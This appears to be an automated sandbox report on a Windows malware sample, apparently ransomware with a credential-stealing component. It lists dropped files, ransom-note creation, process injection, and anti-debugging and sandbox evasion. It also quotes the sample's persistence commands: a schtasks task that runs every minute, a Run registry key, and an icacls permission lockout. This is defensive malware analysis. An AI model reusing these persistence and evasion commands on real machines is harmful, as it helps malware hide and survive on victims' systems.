Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s\U source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051158018.00000000037A8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2067296704.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2082039763.00000000037F3000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2051285855.00000000037C8000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2052379835.00000000037D7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049970590.000000000370B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\P source: R5391762lf.exe, 00000007.00000003.2135081077.0000000003985000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147440371.00000000039A6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135303170.00000000039D6000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2147135864.0000000003994000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\s\\ source: R5391762lf.exe, 00000007.00000003.2066700717.000000000319C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: R5391762lf.exe, 00000007.00000003.2149833514.000000000376F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\D source: R5391762lf.exe, 00000007.00000003.2065679355.00000000037B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\* source: R5391762lf.exe, 00000007.00000003.2135261521.00000000034DD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2135214422.00000000034C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\ source: R5391762lf.exe, 00000007.00000003.2099254627.000000000380B000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2100295097.000000000397E000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2077993512.000000000391E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\Y' source: R5391762lf.exe, 00000007.00000003.2162329285.000000000384C000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2162135110.00000000037FD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2161241305.00000000037BF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\^ source: R5391762lf.exe, 00000007.00000003.1946209635.000000000342A000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050202443.00000000034AD000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1947878317.00000000034AF000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2050850721.00000000034C5000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.2049890930.00000000034A1000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000007.00000003.1946440277.000000000344B000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\R5391762lf.exe	Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Unpacked PE file: 11.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\R5391762lf.exe	Unpacked PE file: 2.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 8.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Unpacked PE file: 11.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 14.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Unpacked PE file: 16.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 20.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Unpacked PE file: 24.2.R5391762lf.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 28.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 31.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 33.2.mstsca.exe.400000.0.unpack

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00412220

PE file contains sections with non-standard names

Source: build3[1].exe.7.dr	Static PE information: section name: .kic
Source: sqln[1].dll.11.dr	Static PE information: section name: .00cfg
Source: mstsca.exe.16.dr	Static PE information: section name: .kic

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_00406805 push ecx; ret	0_2_00406818
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_0449B0AF push ecx; retf	0_2_0449B0B2
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EC8F05 push ecx; ret	0_2_05EC8F18
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00428565 push ecx; ret	2_2_00428578
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_044590AF push ecx; retf	5_2_044590B2
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DD8F05 push ecx; ret	5_2_05DD8F18
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_0457B0AF push ecx; retf	6_2_0457B0B2
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EE8F05 push ecx; ret	6_2_05EE8F18

Persistence and Installation Behavior

Infects executable files (exe, dll, sys, html)

Source: C:\Users\user\Desktop\R5391762lf.exe

System file written: C:\Users\user\AppData\Local\Temp\chrome.exe

Jump to behavior

Drops PE files

Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe.bgjs (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\build3[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\Local Settings\Temp\wctF86A.tmp.bgjs (copy)	Jump to dropped file

Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\$WinREAgent\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\$WinREAgent\Scratch\_README.txt	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	File created: C:\Users\jones\_README.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File created: C:\_README.txt
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	File created: C:\Users\user\_README.txt

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe

Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"

Source: C:\Users\user\Desktop\R5391762lf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\R5391762lf.exe

0_2_00405653

Uses cacls to modify the permissions of files

Source: C:\Users\user\Desktop\R5391762lf.exe

Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d" /deny *S-1-1-0:(OI)(CI)(DE,DC)

Source: C:\Users\user\Desktop\R5391762lf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Process information set: NOOPENFILEERRORBOX

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_0449971C rdtsc

0_2_0449971C

Contains functionality to query network adapater information

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

2_2_0040E670

Contains long sleeps (>= 3 min)

Source: C:\Users\user\Desktop\R5391762lf.exe

Thread delayed: delay time: 700000

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 2142
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Window / User API: threadDelayed 7857

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\R5391762lf.exe	Dropped PE file which has not been started: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe.bgjs (copy)	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	Dropped PE file which has not been started: C:\Users\jones\AppData\Local\Temp\wctF86A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\sqln[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\R5391762lf.exe	Dropped PE file which has not been started: C:\Users\jones\Local Settings\Temp\wctF86A.tmp.bgjs (copy)	Jump to dropped file

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\Desktop\R5391762lf.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\R5391762lf.exe TID: 7700	Thread sleep time: -700000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288	Thread sleep count: 2142 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288	Thread sleep time: -481950s >= -30000s
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288	Thread sleep count: 7857 > 30
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe TID: 5288	Thread sleep time: -1767825s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_00410160
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	2_2_0040F730
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	2_2_0040FB98

Source: C:\Users\user\Desktop\R5391762lf.exe

Thread delayed: delay time: 700000

Jump to behavior

Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\

Source: R5391762lf.exe, 00000002.00000002.1397540119.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000003.1391033574.00000000006A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW'H
Source: R5391762lf.exe, 00000002.00000002.1397540119.000000000067A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: R5391762lf.exe, 00000002.00000002.1397540119.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000003.1391033574.00000000006A7000.00000004.00000020.00020000.00000000.sdmp, R5391762lf.exe, 00000002.00000002.1397540119.0000000000638000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\R5391762lf.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\R5391762lf.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_0449971C rdtsc

0_2_0449971C

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_0040A3A4 IsDebuggerPresent,

0_2_0040A3A4

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_0042A57A

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00412220

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_044980A3 push dword ptr fs:[00000030h]	0_2_044980A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_05EA0042 push dword ptr fs:[00000030h]	0_2_05EA0042
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_044560A3 push dword ptr fs:[00000030h]	5_2_044560A3
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 5_2_05DB0042 push dword ptr fs:[00000030h]	5_2_05DB0042
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_045780A3 push dword ptr fs:[00000030h]	6_2_045780A3
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Code function: 6_2_05EC0042 push dword ptr fs:[00000030h]	6_2_05EC0042

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_00405A52 GetProcessHeap,

0_2_00405A52

Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 0_2_0040A32F SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0040A32F
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004329EC
Source: C:\Users\user\Desktop\R5391762lf.exe	Code function: 2_2_004329BB SetUnhandledExceptionFilter,	2_2_004329BB

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\R5391762lf.exe

0_2_05EA0110

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\R5391762lf.exe	Memory written: C:\Users\user\Desktop\R5391762lf.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Memory written: C:\Users\user\Desktop\R5391762lf.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Memory written: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Memory written: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Memory written: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Memory written: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe base: 400000 value starts with: 4D5A

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\R5391762lf.exe

2_2_00419F90

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\Desktop\R5391762lf.exe "C:\Users\user\Desktop\R5391762lf.exe" --Admin IsNotAutoStart IsNotTask	Jump to behavior
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe --Task	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"	Jump to behavior
Source: C:\Users\user\Desktop\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build2.exe"
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe	Process created: C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe "C:\Users\user\AppData\Local\3e091c6f-72a1-42bd-89b8-7e8a9a94f76c\build3.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe	Process created: C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe "C:\Users\user\AppData\Local\d8960608-daff-4d43-9e12-805e9e1a283d\R5391762lf.exe" --AutoStart
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\R5391762lf.exe

Code function: 0_2_05EC80F6 cpuid

